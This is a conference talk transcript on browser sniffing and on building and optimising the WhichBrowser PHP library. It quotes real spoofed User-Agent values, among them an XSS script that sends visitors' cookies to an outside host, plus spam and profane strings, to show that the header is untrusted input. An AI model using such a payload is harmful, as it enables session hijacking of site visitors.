A presentation at PHP Zwolle in Zwolle, Netherlands, by Niels Leenheer
everybody lies PHP Zwolle, October 26th 2016
1 Browser sniffing explained
why a talk about browser sniffing?
browser sniffing is dirty
you should use feature detection
why a talk about browser sniffing?
what is browser sniffing?
The HTTP specification defines the User-Agent header. It contains a string with information about the browser.
Every request the browser makes to the server includes the User-Agent header
```http
GET http://whichbrowser.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: whichbrowser.net

HTTP/1.1 200 OK
Date: Mon, 08 Feb 2016 10:40:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
ETag: "984-50cae11796432"
Accept-Ranges: bytes
Content-Length: 2436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
```
You can use the User-Agent string to identify the browser, the rendering engine, the operating system, the device model and more
what is browser sniffing good for?
improve UX: if you know the platform or browser, you can streamline the user experience
analytics: if you know your users, you can build a better site for them
error logging: if you know which browser is causing problems, you can fix them
why is browser sniffing hard?
things started out simple
Mosaic: Mosaic/0.9
Mosaic is the name of the browser, 0.9 the version of the browser
Netscape Navigator: Mozilla/1.0 (Win3.1)
Mozilla is the code name of the browser, 1.0 the version of the browser, Win3.1 the operating system
but it quickly started to get complicated
Internet Explorer: Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
MSIE is the name of the browser, "Mozilla/1.0 (compatible" means compatible with Netscape Navigator 1.0, 1.0 is the version of the browser, Windows 95 the operating system
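Up to this point the strings still follow one simple shape: a product name, a slash, a version, and an optional comment in parentheses. The sketch below splits a string along that shape. The function name `productTokens` is made up for illustration. The result shows where Internet Explorer actually hides its identity: inside the comment, behind the Netscape-compatible `Mozilla/1.0` token.

```php
<?php
// Hypothetical helper: split a User-Agent string into product tokens.
// Each token is name[/version], optionally followed by a (comment).
// This simple grammar only holds for early strings like the ones above.
function productTokens(string $ua): array
{
    preg_match_all(
        '/([^\s\/()]+)(?:\/([^\s()]+))?(?:\s*\(([^)]*)\))?/',
        $ua,
        $matches,
        PREG_SET_ORDER
    );

    $tokens = [];
    foreach ($matches as $m) {
        $tokens[] = [
            'name'    => $m[1],
            // Unmatched optional groups are '' or missing: normalise them
            'version' => ($m[2] ?? '') !== '' ? $m[2] : null,
            'comment' => ($m[3] ?? '') !== '' ? array_map('trim', explode(';', $m[3])) : [],
        ];
    }
    return $tokens;
}

// The first token claims to be Netscape; the real browser is in the comment
$tokens = productTokens('Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)');
echo $tokens[0]['name'], ' ', $tokens[0]['version'], PHP_EOL; // Mozilla 1.0
echo $tokens[0]['comment'][1], PHP_EOL;                          // MSIE 1.0
```

Later strings in this talk break this grammar quickly, which is exactly the point of the slides that follow.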
Opera: Opera/8.54 (Windows 95; U; en)
Opera is the name of the browser, 8.54 the version of the browser, Windows 95 the operating system, en the English language and U United States level encryption
Opera: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Opera is the name of the browser, 10.00 the version of the browser, Presto/2.2.0 the rendering engine
Opera: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10
Opera is the name of the browser, 9.80 a fake version of the browser, Version/10.10 the real version of the browser
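Opera kept sending `Opera/9.80`, so a parser has to prefer the `Version/` token whenever it is present. It should fall back to the number after `Opera/` only when that token is missing. A minimal sketch of that rule follows. `operaVersion` is a hypothetical name, and the check only covers the Presto-era strings shown here.

```php
<?php
// Hypothetical helper: the real version of a Presto-based Opera,
// ignoring the frozen "Opera/9.80" token when a Version/ token exists.
function operaVersion(string $ua): ?string
{
    if (strpos($ua, 'Opera') === false) {
        return null;
    }
    // Opera 10 and later put the real version in a separate Version/ token
    if (preg_match('/Version\/([0-9.]+)/', $ua, $m)) {
        return $m[1];
    }
    // Older releases: the number after "Opera/" is the real version
    if (preg_match('/Opera\/([0-9.]+)/', $ua, $m)) {
        return $m[1];
    }
    return null;
}

echo operaVersion('Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10'), PHP_EOL; // 10.10
echo operaVersion('Opera/8.54 (Windows 95; U; en)'), PHP_EOL;                                    // 8.54
```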
Firefox: Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5
Gecko is the name of the rendering engine, 20090624 its build date and rv:1.9.1 its version; Firefox is the name of the browser and 3.5 its version
Firefox: Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0
The build date is no longer updated
Firefox: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
and it gets worse…
Safari: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
Safari is the name of the browser, Version/3.2.3 the version of the browser
Chrome: Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
Chrome is the name of the browser, 15.0.874.120 the version of the browser
Opera: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
OPR is the name of the browser, 31.0.1889.180 the version of the browser
Internet Explorer: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
rv:11.0 is the version of the browser
Edge: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
Edge is the name of the browser, 12.10162 the version of the browser
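Each of these strings claims to be several browsers at once, so the order of the checks decides the result. The most specific token has to be tested first. The sketch below covers only the strings on these slides. The rule list and the name `identifyBrowser` are illustrative assumptions, not WhichBrowser's actual code.

```php
<?php
// Hypothetical sketch: order matters, because Edge and Opera also claim to be
// Chrome and Safari, and Chrome also claims to be Safari.
function identifyBrowser(string $ua): ?string
{
    $rules = [
        'Edge'              => '/Edge\/([0-9.]+)/',
        'Opera'             => '/OPR\/([0-9.]+)/',
        'Chrome'            => '/Chrome\/([0-9.]+)/',
        'Safari'            => '/Version\/([0-9.]+).*Safari\//',
        // IE 11 no longer says MSIE: recognise Trident plus the rv: version
        'Internet Explorer' => '/Trident\/[0-9.]+;.*rv:([0-9.]+)/',
    ];
    foreach ($rules as $name => $pattern) {
        if (preg_match($pattern, $ua, $m)) {
            return $name . ' ' . $m[1];
        }
    }
    return null;
}

echo identifyBrowser('Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'), PHP_EOL;
// Internet Explorer 11.0
```

If `Chrome` were checked before `Edge` or `OPR`, both of those browsers would be reported as Chrome.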
and those were all relatively normal User-Agent strings
“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings
Samsung Internet: Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
SAMSUNG GT-I9505 identifies the Samsung device, Version/1.5 is the version of the browser
Nokia Xpress for Windows Phone: Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
Sometimes browsers include a compatibility mode or desktop mode, which deliberately changes the User-Agent string
Opera: Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
Opera is the name of the browser, Linux zbov the name of the operating system, Version/11.50 the version of the browser
Opera Mobile (desktop mode): Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
Opera is the name of the browser, zbov is ROT13-encrypted "mobi", Version/11.50 is the version of the browser
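In desktop mode the string gives itself away only through the ROT13-encoded platform name. PHP ships `str_rot13()`, so a check could look like the sketch below. The function name is hypothetical. The sketch also assumes the encoded word always follows `Linux `, as in the string above.

```php
<?php
// Hypothetical check: Opera Mobile in desktop mode hides "mobi" as ROT13 "zbov"
function isOperaMobileInDesktopMode(string $ua): bool
{
    return strpos($ua, 'Opera/') === 0
        && preg_match('/Linux ([a-z]+);/', $ua, $m) === 1
        && str_rot13($m[1]) === 'mobi';
}

var_dump(str_rot13('zbov')); // string(4) "mobi"
var_dump(isOperaMobileInDesktopMode('Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50')); // bool(true)
```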
Internet Explorer: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
MSIE 8.0 is the browser version
Internet Explorer (compatibility view): Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Trident/5.0 means it is actually Internet Explorer 9
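In compatibility view the MSIE token reports the emulated version, but the Trident token still reveals the real engine. For the Trident versions that shipped with Internet Explorer 8 to 11 the mapping is fixed, so a small lookup table is enough. The function name in this sketch is hypothetical.

```php
<?php
// Hypothetical helper: the real Internet Explorer version from the Trident token.
// Only covers Trident 4.0 to 7.0 (Internet Explorer 8 to 11).
function ieVersionFromTrident(string $ua): ?int
{
    $map = [4 => 8, 5 => 9, 6 => 10, 7 => 11];
    if (!preg_match('/Trident\/([0-9]+)\./', $ua, $m)) {
        return null;
    }
    return $map[(int) $m[1]] ?? null;
}

$ua = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)';
preg_match('/MSIE ([0-9.]+)/', $ua, $msie);
echo 'Claims MSIE ', $msie[1], ', is actually IE ', ieVersionFromTrident($ua), PHP_EOL;
// Claims MSIE 8.0, is actually IE 9
```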
Sometimes browsers are just weird
Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0
Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1
Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)
Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1
Mozilla/4.0 (PSP (PlayStation Portable); 2.60)
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?
BORK BORK BORK
And it is possible to change the User-Agent string yourself
spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)
XSS attacks
```html
<script>alert("My Little Pony");</script>
<script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>
<img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">
```
funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) (╯°□°)╯︵ ┻━┻
angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.
User-Agent strings cannot be trusted!
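Anyone can put markup in the header, so a User-Agent string has to be treated like any other user input. Escaping it with `htmlspecialchars()` neutralises payloads like the XSS examples above whenever it is shown on a page, for example in a log viewer or an admin dashboard. This is a minimal sketch, and the function name is illustrative.

```php
<?php
// Treat the User-Agent header as untrusted input: escape it before output.
function renderUserAgent(string $ua): string
{
    // ENT_QUOTES also escapes quotes; ENT_SUBSTITUTE replaces invalid UTF-8
    return '<code>' . htmlspecialchars($ua, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</code>';
}

// The header may be missing entirely, so fall back to an empty string
echo renderUserAgent($_SERVER['HTTP_USER_AGENT'] ?? ''), PHP_EOL;
```

The same caution applies when storing the string: use prepared statements rather than concatenating it into SQL.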
Everybody lies
you should never use browser sniffing for controlling access to your website
you should never use browser sniffing for determining browser capabilities
you should never build your own browser sniffing library
2 Creating my own browser sniffing library
open source
PHP 5.4 and up, including PHP 7 and HHVM
12,500 lines of code
100% code coverage, 5,000+ individual tests
device database with 36,000 entries
PSR-1 and PSR-2 coding style
PSR-4 autoloading
PSR-6 caching interface
1 How to maintain quality?
testing of course!
What tools do we use?
PHP CodeSniffer: check if your code follows coding standards
PHPUnit: very good for testing the code that defines the public APIs, but not so good for testing the actual browser detection
Testrunner: a very lean framework for testing browser sniffing
Testrunner: YAML files that contain a list of user agent strings and the expected results
Testrunner: no coding required, just add a new user agent string and automatically generate the expected results
Continuous integration?
Yes, please!
Automatically start up virtual machines that run your whole test suite after every commit
Automatic testing of your code in multiple versions of PHP
Automatic checking of pull requests with feedback directly in Github
.travis.yml

```yaml
language: php

php:
  - 5.4
  - 5.5
  - 5.6
  - 7.0
  - hhvm

before_script:
  - composer self-update
  - composer update --ignore-platform-reqs --prefer-source

script:
  - vendor/bin/phpcs --standard=PSR1,PSR2 -n src
  - php bin/runner.php --coverage --show check
  - vendor/bin/phpunit --coverage-clover phpunit.xml

after_script:
  - travis_retry php vendor/bin/coveralls -v
```
Check if your tests cover all of your source code
Coverage information is generated by PHPUnit and Testrunner
Generating code coverage
Requires Xdebug or phpdbg
Common format is Clover XML
PHPUnit supports generating coverage as Clover XML:

```
phpunit --coverage-clover phpunit.xml
```
For testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML
There is a package for that! phpunit/php-code-coverage

```
composer require phpunit/php-code-coverage
```

```php
$coverage = new PHP_CodeCoverage;
$coverage->filter()->addDirectoryToWhitelist('src');
$coverage->start('Testrunner');

// run your tests

$coverage->stop();

$writer = new PHP_CodeCoverage_Report_Clover;
$writer->process($coverage, 'runner.xml');
```
2 How to make it faster!
profiling of course!
WhichBrowser used to be 4 times slower than its competitors
Chart: average parsing time (ms) of UA Parser, Piwik, WhichBrowser, Wurfl and Browscap (source: http://thadafinser.github.io/UserAgentParserComparison/)
Why?
Use Xdebug and QCacheGrind
Xdebug has an option to create performance profiles

```ini
zend_extension="/usr/local/opt/php70-xdebug/xdebug.so"
xdebug.profiler_enable=1
```
View performance profiles in QCacheGrind
65% of the time was spent in DeviceModels::identify()
65% of the time was spent looking through the device database
65% of the time was spent iterating over huge arrays
```php
DeviceModels::$ANDROID_MODELS = [
    …
    'GT-I92(20|28)!'       => [ 'Samsung', 'Galaxy Note' ],
    'GT-I92(30|35)!'       => [ 'Samsung', 'Galaxy Golden' ],
    'GT-I9250'             => [ 'Samsung', 'Galaxy Nexus' ],
    'GT-I92(60|68)!'       => [ 'Samsung', 'Galaxy Premier' ],
    'GT-I9295'             => [ 'Samsung', 'Galaxy S4 Active' ],
    'GT-I93(00|03|05|08)!' => [ 'Samsung', 'Galaxy S III' ],
    'GT-I93(01)!'          => [ 'Samsung', 'Galaxy S3 Neo' ],
    'GT-I95(00|05|07)!'    => [ 'Samsung', 'Galaxy S4' ],
    'GT-I95(02|08)!'       => [ 'Samsung', 'Galaxy S4 Duos' ],
    'GT-I95(06)!'          => [ 'Samsung', 'Galaxy S4 Advance' ],
    …
];
```
'GT-I93(00|03|05|08)!' → "/^GT-I93(00|03|05|08)/i"
Why not a real database?
Easy editing, easy deployment
Order in the file matters
Why a PHP file?
No need to parse JSON or YAML
The whole database can be cached by the opcode cache
But you do need to iterate over every single item in that array until you have a match
Why not create an index?
You can’t create an index for regular expressions :-(
Or can you?
No, you can’t!
If only we could determine all possible matches for a regular expression…
1 All regular expressions are fixed to the start of the string
2 The shorter the index, the easier it is to find the matching strings
The ideal index length was 2 or 3 characters
We can do that!
/^GT-I93(00|03|05|08)/i → GT
/^(SHP-)?(SHARP )?SH[0-9]{2,3}/i → SH
/^(MEDION|(MD )?LIFETAB)/i → ME, MD, LI
/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i → LE, ID, K0, K1, K2, K3, K4, K…
/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i → LE, ID, “complex list”
Can we do this in PHP?
There is a package for that! icomefromthenet/reverse-regex

```
composer require icomefromthenet/reverse-regex
```

```php
use ReverseRegex\Lexer;

$lexer = new Lexer($regexp);
$lexer->moveNext();

if ($lexer->isNextTokenAny([ Lexer::T_LITERAL_CHAR, Lexer::T_LITERAL_NUMERIC ])) {
    …
} else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) {
    …
} else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) {
    …
} else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) {
    …
```
Generate keys from a regular expression in just 100 lines of code
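The talk's key generator builds on the reverse-regex lexer. For readers who want to see the idea without that dependency, here is a hand-rolled sketch that computes every possible 2-character prefix of a start-anchored, case-insensitive pattern. This is a different, simplified technique and not WhichBrowser's code. All function names are hypothetical. It only supports literals, escaped literals, `[...]` classes with ranges, `(a|b)` groups and the `?`, `{n}` and `{m,n}` quantifiers, and it requires PHP 7.1 or later.

```php
<?php
// Hypothetical sketch: index keys (first $k chars of every possible match).
function parseAlternatives(string $re, int &$pos): array
{
    $alternatives = [[]];
    while ($pos < strlen($re) && $re[$pos] !== ')') {
        $c = $re[$pos++];
        if ($c === '|') {
            $alternatives[] = [];
            continue;
        }
        if (strpos('.*+$', $c) !== false) {
            throw new InvalidArgumentException("Unsupported syntax: $c");
        }
        if ($c === '(') {
            $node = ['group', parseAlternatives($re, $pos)];
            $pos++; // skip ')'
        } elseif ($c === '[') {
            $chars = [];
            while ($re[$pos] !== ']') {
                if (($re[$pos + 1] ?? '') === '-' && ($re[$pos + 2] ?? ']') !== ']') {
                    foreach (range($re[$pos], $re[$pos + 2]) as $ch) {
                        $chars[] = (string) $ch; // range('0', '9') yields integers
                    }
                    $pos += 3;
                } else {
                    $chars[] = $re[$pos++];
                }
            }
            $pos++; // skip ']'
            $node = ['chars', $chars];
        } else {
            // A literal, or the character following a backslash
            $node = ['chars', [$c === '\\' ? $re[$pos++] : $c]];
        }
        // Quantifier: ?, {n} or {m,n}; default is exactly once
        [$min, $max] = [1, 1];
        if (($re[$pos] ?? '') === '?') {
            [$min, $max] = [0, 1];
            $pos++;
        } elseif (($re[$pos] ?? '') === '{') {
            $end = strpos($re, '}', $pos);
            $bounds = explode(',', substr($re, $pos + 1, $end - $pos - 1));
            [$min, $max] = [(int) $bounds[0], (int) ($bounds[1] ?? $bounds[0])];
            $pos = $end + 1;
        }
        $alternatives[count($alternatives) - 1][] = [$node, $min, $max];
    }
    return $alternatives;
}

// All distinct prefixes of at most $k characters the alternatives can produce
function expandAlternatives(array $alternatives, int $k): array
{
    $result = [];
    foreach ($alternatives as $sequence) {
        $prefixes = [''];
        foreach ($sequence as [$node, $min, $max]) {
            $options = $node[0] === 'group' ? expandAlternatives($node[1], $k) : $node[1];
            $next = [];
            foreach ($prefixes as $prefix) {
                // Repeat the node $min to $max times; prefixes of length $k are final
                $current = [$prefix];
                for ($i = 0; ; $i++) {
                    if ($i >= $min) {
                        $next = array_merge($next, $current);
                    }
                    if ($i === $max) {
                        break;
                    }
                    $grown = [];
                    foreach ($current as $p) {
                        if (strlen($p) >= $k) {
                            $grown[] = $p;
                            continue;
                        }
                        foreach ($options as $o) {
                            $grown[] = substr($p . $o, 0, $k);
                        }
                    }
                    $current = array_unique($grown);
                }
            }
            $prefixes = array_unique($next);
        }
        $result = array_merge($result, $prefixes);
    }
    return array_values(array_unique($result));
}

function indexKeys(string $regex, int $k = 2): array
{
    // "/^GT-I93(00|03)/i" -> "GT-I93(00|03)": drop delimiters, anchor and flags
    $body = substr($regex, 2, strrpos($regex, '/') - 2);
    $pos = 0;
    $keys = array_unique(array_map('strtoupper', expandAlternatives(parseAlternatives($body, $pos), $k)));
    sort($keys, SORT_STRING);
    return $keys;
}

echo implode(', ', indexKeys('/^(MEDION|(MD )?LIFETAB)/i')), PHP_EOL; // LI, MD, ME
```

For the Lenovo pattern this yields LE, ID and all 30 combinations of K, S or V followed by a digit. That is the "complex list" from the slide.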
```php
DeviceModels::$ANDROID_INDEX = [
    …
    '@HW' => array (
        0 => '(HW-|HUAWEI )?(TIT|TAG)!!',
        1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!',
        2 => '(HW-|HUAWEI )?(CHC|KII)!!',
        3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!',
        4 => '(Huawei|Ascend|HW-)!!',
        5 => 'HW-01E',
        6 => 'HW-03E',
    ),
    …
];
```
Looking up an android device (without index):
1✕ foreach ($data as $item)
15,000✕ preg_match($item, $model) or $item === $model
1✕ return $item
Looking up an android device (with index):
1✕ $i = $index[substr($model, 0, 2)]
1✕ foreach ($i as $item)
1 - 100✕ preg_match($item, $model) or $item === $model
1✕ return $data[$item]
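The indexed lookup can be sketched end to end with a few entries from the device table above. This sketch makes three assumptions. Keys ending in a single `!` become start-anchored, case-insensitive patterns, following the `'GT-I93(00|03|05|08)!'` example. Other keys must match exactly. Index buckets are named `'@'` plus the first two characters, mirroring the `'@HW'` key. The `!!` suffix in the index is not covered, and `lookupModel` is a hypothetical name.

```php
<?php
// A few entries from the device table above
$data = [
    'GT-I9250'             => ['Samsung', 'Galaxy Nexus'],
    'GT-I93(00|03|05|08)!' => ['Samsung', 'Galaxy S III'],
    'GT-I95(00|05|07)!'    => ['Samsung', 'Galaxy S4'],
];

// Index bucket: '@' plus the first two characters of the model
$index = [
    '@GT' => array_keys($data),
];

function lookupModel(string $model, array $index, array $data): ?array
{
    $key = '@' . strtoupper(substr($model, 0, 2));

    // Only the handful of candidates in this bucket are tried
    foreach ($index[$key] ?? [] as $item) {
        if (substr($item, -1) === '!') {
            $found = preg_match('/^' . substr($item, 0, -1) . '/i', $model) === 1;
        } else {
            $found = $item === $model;
        }
        if ($found) {
            return $data[$item];
        }
    }
    return null;
}

echo implode(' ', lookupModel('GT-I9505', $index, $data)), PHP_EOL; // Samsung Galaxy S4
```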
Chart: average parsing time (ms) of UA Parser, Piwik, WhichBrowser, Wurfl and Browscap (source: http://thadafinser.github.io/UserAgentParserComparison/)
But wait…
Again lists of regular expressions, but with no possible way to create an index
Multiple calls to preg_match with simple regular expressions
```php
if (preg_match('/Nintendo Wii/u', $ua)) { … }
if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
if (preg_match('/PlayStation Vita/u', $ua)) { … }
if (preg_match('/PlayStation 4/u', $ua)) { … }
if (preg_match('/Xbox One/u', $ua)) { … }
```
preg_match is fast
But it has a bit of overhead
Replace multiple calls with a single call to reduce overhead
```php
if (!preg_match('/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui', $ua)) {
    return;
}

if (preg_match('/Nintendo Wii/u', $ua)) { … }
if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
if (preg_match('/PlayStation Vita/u', $ua)) { … }
if (preg_match('/PlayStation 4/u', $ua)) { … }
```
We still do the individual checks, but only if we are certain there is a match
Chart: average parsing time (ms) of UA Parser, Piwik, WhichBrowser, Wurfl and Browscap (source: http://thadafinser.github.io/UserAgentParserComparison/)
On par with others, but with a massive device database
3 How to make it even faster-der!
caching of course!
A common use case of WhichBrowser is to call it from every page of your website
Instead of analysing every page view you can do it once and reuse that result
Memcached, Redis, XCache, Couchbase, APC, MongoDB, filesystem, Zend Data Cache, WinCache
A universal caching API
PSR-6
Memcached

```php
// Initialise the Memcached client
$client = new \Memcached();
$client->addServer('localhost', 11211);

// Retrieve our data
$data = $client->get($id);

if ($client->getResultCode() === \Memcached::RES_NOTFOUND) {
    $data = …;
    $client->set($id, $data);
}
```
Memcached using a PSR-6 cache adapter

```php
// Initialise the Memcached client
$client = new \Memcached();
$client->addServer('localhost', 11211);

// Initialise our storage pool
$pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client);

// Retrieve our data
$item = $pool->getItem($id);

if ($item->isHit()) {
    $data = $item->get();
} else {
    $data = …;
    $item->set($data);
    $pool->save($item);
}
```

Redis using a PSR-6 cache adapter

```php
// Initialise the Redis client
$client = new \Redis();
$client->connect('localhost', 6379);

// Initialise our storage pool
$pool = new \Cache\Adapter\Redis\RedisCachePool($client);

// Retrieve our data
$item = $pool->getItem($id);

if ($item->isHit()) {
    $data = $item->get();
} else {
    $data = …;
    $item->set($data);
    $pool->save($item);
}
```
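The PSR-6 examples use an `$id` that the slides do not define. PSR-6 only guarantees support for keys made of `A-Z`, `a-z`, `0-9`, `_` and `.`, up to 64 characters, and it reserves `{}()/\@:`. User-Agent strings are full of those reserved characters, so one option is to hash the headers into a key. The sketch below does that, with hypothetical function names. A plain array stands in for a real PSR-6 pool so the example runs without dependencies.

```php
<?php
// Hypothetical helper: a PSR-6 safe key for a set of request headers.
// Header names are lower-cased and sorted so equivalent requests share a key.
function cacheKey(array $headers): string
{
    $headers = array_change_key_case($headers, CASE_LOWER);
    ksort($headers);
    // 13 + 32 hex characters: within the 64 characters PSR-6 requires support for
    return 'whichbrowser_' . md5(serialize($headers));
}

// Analyse once per distinct set of headers, then reuse the stored result
function analyseOnce(array $headers, callable $analyse, array &$cache)
{
    $key = cacheKey($headers);
    if (!array_key_exists($key, $cache)) {
        $cache[$key] = $analyse($headers);
    }
    return $cache[$key];
}

$cache = [];
$calls = 0;
$analyse = function (array $headers) use (&$calls) {
    $calls++;
    return 'analysed';
};
analyseOnce(['User-Agent' => 'Mosaic/0.9'], $analyse, $cache);
analyseOnce(['user-agent' => 'Mosaic/0.9'], $analyse, $cache);
echo $calls, PHP_EOL; // 1
```

With a real pool, `cacheKey()` would supply the `$id` passed to `$pool->getItem()`.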
Install adapters for the storage method you want
Set up the storage pool and give it to WhichBrowser
WhichBrowser without caching

```php
// Analyse the user agent string
$result = new WhichBrowser\Parser();
$result->analyse(getallheaders());

echo $result->toString();
```

WhichBrowser with Memcached caching

```php
// Initialise the Memcached client
$client = new \Memcached();
$client->addServer('localhost', 11211);

// Initialise our storage pool
$pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client);

// Analyse the user agent string
$result = new WhichBrowser\Parser();
$result->setCache($pool);
$result->analyse(getallheaders());

echo $result->toString();
```
Just 50 lines of code
1 Test everything! 2 Profile everything! 3 Cache everything!
4 Never, ever create your own browser sniffing library
Thank you!
This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on GitHub still shows millions of lines of code referring to user agent strings, so this message clearly hasn't landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.